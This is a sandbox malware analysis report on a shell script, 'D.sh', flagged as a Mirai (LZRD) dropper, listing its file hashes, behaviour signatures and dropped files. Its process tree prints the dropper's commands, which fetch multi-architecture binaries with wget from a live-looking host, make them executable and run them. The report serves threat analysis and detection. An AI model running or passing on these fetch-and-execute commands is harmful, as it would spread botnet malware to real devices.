Analysis
-
max time kernel
151s -
max time network
139s -
platform
debian-9_armhf -
resource
debian9-armhf-20221111-en -
resource tags
arch:armhfimage:debian9-armhf-20221111-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
30-04-2023 13:01
Static task
static1
Behavioral task
behavioral1
Sample
D.sh
Resource
ubuntu1804-amd64-en-20211208
Behavioral task
behavioral2
Sample
D.sh
Resource
debian9-armhf-20221111-en
Behavioral task
behavioral3
Sample
D.sh
Resource
debian9-mipsbe-en-20211208
General
-
Target
D.sh
-
Size
1KB
-
MD5
e41b9523a8373b79498bef2473723adf
-
SHA1
bd468f9718ef86d34c88552dd01464f85e8e2ee5
-
SHA256
27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e
-
SHA512
0b933fcf0f8a24ffd62431f47469529fce2170307777a632d74af893902af3ba60a14076a74874354c7667b39e5ebf37a2f6f1e9d145599d22c2fbbb03f31476
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
-
Writes file to system bin folder 1 TTPs 2 IoCs
Processes:
description ioc File opened for modification /sbin/watchdog File opened for modification /bin/watchdog -
Executes dropped EXE 13 IoCs
Processes:
wgetcatchmodBTwgetcatchmodBTwgetpid process 377 wget 383 cat 389 chmod 395 BT 401 wget 407 cat 412 chmod 417 BT 422 wget 430 436 442 448 -
Processes:
resource yara_rule /tmp/x86 upx /tmp/BT upx /tmp/mips upx /tmp/BT upx /tmp/x86_64 upx /tmp/BT upx /tmp/mpsl upx /tmp/BT upx /tmp/arm upx /tmp/BT upx /tmp/arm5 upx /tmp/BT upx /tmp/arm6 upx /tmp/BT upx /tmp/arm7 upx /tmp/BT upx /tmp/ppc upx /tmp/BT upx -
Reads runtime system information 21 IoCs
Reads data from /proc virtual filesystem.
Processes:
BTBTdescription ioc File opened for reading /proc/477/cmdline File opened for reading /proc/self/exe BT File opened for reading /proc/463/cmdline File opened for reading /proc/465/cmdline File opened for reading /proc/467/cmdline File opened for reading /proc/469/cmdline File opened for reading /proc/471/cmdline File opened for reading /proc/473/cmdline File opened for reading /proc/479/cmdline File opened for reading /proc/self/exe BT File opened for reading /proc/425/cmdline File opened for reading /proc/451/cmdline File opened for reading /proc/453/cmdline File opened for reading /proc/458/cmdline File opened for reading /proc/480/cmdline File opened for reading /proc/460/cmdline File opened for reading /proc/461/cmdline File opened for reading /proc/475/cmdline File opened for reading /proc/459/cmdline File opened for reading /proc/470/cmdline File opened for reading /proc/481/cmdline -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/mpsl wget File opened for modification /tmp/arm6 wget File opened for modification /tmp/ppc wget File opened for modification /tmp/spc wget File opened for modification /tmp/m68k wget File opened for modification /tmp/x86 wget File opened for modification /tmp/mips wget File opened for modification /tmp/arm wget File opened for modification /tmp/arm5 wget File opened for modification /tmp/arm7 wget File opened for modification /tmp/sh4 wget File opened for modification /tmp/BT File opened for modification /tmp/x86_64 wget
Processes
-
/tmp/D.sh/tmp/D.sh1⤵
-
wgetwget http://ping.999apk.top/x862⤵
- Writes file to tmp directory
-
catcat x862⤵
-
chmodchmod +x BT D.sh systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x862⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/mips2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
catcat mips2⤵
-
chmodchmod +x BT D.sh mips systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x862⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/arc2⤵
-
catcat arc2⤵
- Executes dropped EXE
-
chmodchmod +x BT D.sh mips systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x862⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/x86_642⤵
- Writes file to tmp directory
-
catcat x86_642⤵
-
chmodchmod +x BT D.sh mips systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
- Executes dropped EXE
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/mpsl2⤵
- Writes file to tmp directory
-
catcat mpsl2⤵
-
chmodchmod +x BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
- Executes dropped EXE
-
wgetwget http://ping.999apk.top/arm2⤵
- Writes file to tmp directory
-
catcat arm2⤵
-
chmodchmod +x arm BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/arm52⤵
- Executes dropped EXE
- Writes file to tmp directory
-
catcat arm52⤵
-
chmodchmod +x arm arm5 BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/arm62⤵
- Writes file to tmp directory
-
catcat arm62⤵
- Executes dropped EXE
-
chmodchmod +x arm arm5 arm6 BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
- Reads runtime system information
-
wgetwget http://ping.999apk.top/arm72⤵
- Writes file to tmp directory
-
catcat arm72⤵
-
chmodchmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
- Executes dropped EXE
-
./BT./BT2⤵
- Reads runtime system information
-
wgetwget http://ping.999apk.top/ppc2⤵
- Writes file to tmp directory
-
catcat ppc2⤵
-
chmodchmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
- Executes dropped EXE
-
wgetwget http://ping.999apk.top/spc2⤵
- Writes file to tmp directory
-
catcat spc2⤵
-
chmodchmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc spc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/m68k2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
catcat m68k2⤵
-
chmodchmod +x arm arm5 arm6 arm7 BT D.sh m68k mips mpsl ppc spc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
-
wgetwget http://ping.999apk.top/sh42⤵
- Writes file to tmp directory
-
catcat sh42⤵
-
chmodchmod +x arm arm5 arm6 arm7 BT D.sh m68k mips mpsl ppc sh4 spc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_642⤵
-
./BT./BT2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/BTFilesize
21KB
MD50cb2516e0c4665363644396499cb7aec
SHA1995fc2ab54085422d82676b252a2bab06cdf5704
SHA2567113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1
SHA512d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88
-
/tmp/BTFilesize
18KB
MD50e6fe9b5313bd0deaffb51f2fbbe06cb
SHA16facd101542faf57dab7824909e0c3d29513da60
SHA2563ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863
SHA51243fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e
-
/tmp/BTFilesize
26KB
MD567110fddb816519a3d5d352b5f32bbbb
SHA16a541fce786c16301901087977b30476920e3382
SHA25614acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6
SHA512f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35
-
/tmp/BTFilesize
45KB
MD5db3001dc744f15e5dfd694e26b57979c
SHA19fde5950b212a39e94e15ed3347cca61d514a95b
SHA256076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e
SHA5121d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731
-
/tmp/BTFilesize
21KB
MD56260fc510dee1aef342de3bf2892bf7c
SHA14c5d1757ef56a3c4578f7db2949800b0a8b08005
SHA256f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4
SHA512b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72
-
/tmp/BTFilesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
/tmp/BTFilesize
57KB
MD5bebd6bb6e9ba158796f9ec38b0bb6d61
SHA1c28caab155d866d7223b6f09e43f0d9176344c8c
SHA256b9feac2aba1c7fef005f5992c7d3dc15d1564ccdc8aa3d833d7fe76d46a13e5a
SHA512b21b5604279d00acc7e86950f72bc79f32d3b65bad69ae49977acf606c9b1539b1ae78d001a5a4e1529e6258e19079f8858ea3539bd2d004c74918e909d9ea56
-
/tmp/BTFilesize
53KB
MD56fdd07c178e50ab399b8c76b2843f2f6
SHA12f5df889cb98984a913a1c24efb222492aa93c27
SHA256f48d2353dd546d477e7befe5c2b59e861c425477cfa345f27f6a9d4c5ca8e070
SHA51252224cb4f205020548e5430f310240d544f2eca1bd2ae0b2f4eac78195963d4836b2740bda292d696ef81ab2c053b85b6b6f38175e364394c3031bdb2df0ad8d
-
/tmp/BTFilesize
48KB
MD5df45048f800e71326852acbdd078a3ae
SHA15377821189664f7cc467f640c51b58841f8d9bf3
SHA256e0906b20d81f27308654f5ba1a68865c752881b530ebcfeb76d0651038753b8c
SHA512352a43d623da15e498ed0489a79db0c1b53f7ad3a8e7c0bddcb63df7d90f16a27893e0152d5283a695c9fa78c06bb2b54e9bc1abb88c6b00a16a7eeb97768d4d
-
/tmp/BTFilesize
23KB
MD55ffea0b004a955d227e947d486ab573f
SHA1de6fe607474109e92373ed4b6f54cb678e69f04f
SHA256472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02
SHA51293f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f
-
/tmp/BTFilesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
/tmp/BTFilesize
24KB
MD5d1d7efff7b9a9627879ceb1a79832a28
SHA15f88e33dec795ff429d2a44c7743d3bc948dcc19
SHA256c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d
SHA512301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c
-
/tmp/armFilesize
21KB
MD50cb2516e0c4665363644396499cb7aec
SHA1995fc2ab54085422d82676b252a2bab06cdf5704
SHA2567113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1
SHA512d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88
-
/tmp/arm5Filesize
18KB
MD50e6fe9b5313bd0deaffb51f2fbbe06cb
SHA16facd101542faf57dab7824909e0c3d29513da60
SHA2563ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863
SHA51243fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e
-
/tmp/arm6Filesize
26KB
MD567110fddb816519a3d5d352b5f32bbbb
SHA16a541fce786c16301901087977b30476920e3382
SHA25614acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6
SHA512f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35
-
/tmp/arm7Filesize
45KB
MD5db3001dc744f15e5dfd694e26b57979c
SHA19fde5950b212a39e94e15ed3347cca61d514a95b
SHA256076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e
SHA5121d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731
-
/tmp/m68kFilesize
53KB
MD56fdd07c178e50ab399b8c76b2843f2f6
SHA12f5df889cb98984a913a1c24efb222492aa93c27
SHA256f48d2353dd546d477e7befe5c2b59e861c425477cfa345f27f6a9d4c5ca8e070
SHA51252224cb4f205020548e5430f310240d544f2eca1bd2ae0b2f4eac78195963d4836b2740bda292d696ef81ab2c053b85b6b6f38175e364394c3031bdb2df0ad8d
-
/tmp/mipsFilesize
23KB
MD55ffea0b004a955d227e947d486ab573f
SHA1de6fe607474109e92373ed4b6f54cb678e69f04f
SHA256472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02
SHA51293f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f
-
/tmp/mpslFilesize
24KB
MD5d1d7efff7b9a9627879ceb1a79832a28
SHA15f88e33dec795ff429d2a44c7743d3bc948dcc19
SHA256c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d
SHA512301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c
-
/tmp/ppcFilesize
21KB
MD56260fc510dee1aef342de3bf2892bf7c
SHA14c5d1757ef56a3c4578f7db2949800b0a8b08005
SHA256f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4
SHA512b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72
-
/tmp/sh4Filesize
48KB
MD5df45048f800e71326852acbdd078a3ae
SHA15377821189664f7cc467f640c51b58841f8d9bf3
SHA256e0906b20d81f27308654f5ba1a68865c752881b530ebcfeb76d0651038753b8c
SHA512352a43d623da15e498ed0489a79db0c1b53f7ad3a8e7c0bddcb63df7d90f16a27893e0152d5283a695c9fa78c06bb2b54e9bc1abb88c6b00a16a7eeb97768d4d
-
/tmp/spcFilesize
57KB
MD5bebd6bb6e9ba158796f9ec38b0bb6d61
SHA1c28caab155d866d7223b6f09e43f0d9176344c8c
SHA256b9feac2aba1c7fef005f5992c7d3dc15d1564ccdc8aa3d833d7fe76d46a13e5a
SHA512b21b5604279d00acc7e86950f72bc79f32d3b65bad69ae49977acf606c9b1539b1ae78d001a5a4e1529e6258e19079f8858ea3539bd2d004c74918e909d9ea56
-
/tmp/x86Filesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
/tmp/x86_64Filesize
20KB
MD59ec34b55333c129649743dcbd42e4256
SHA1da9072bba9e8a239356d51a1fcf9418de30a86d0
SHA256fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
SHA512d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
-
memory/417-1-0x00008000-0x000228c4-memory.dmp
-
memory/422-2-0x00008000-0x00026464-memory.dmp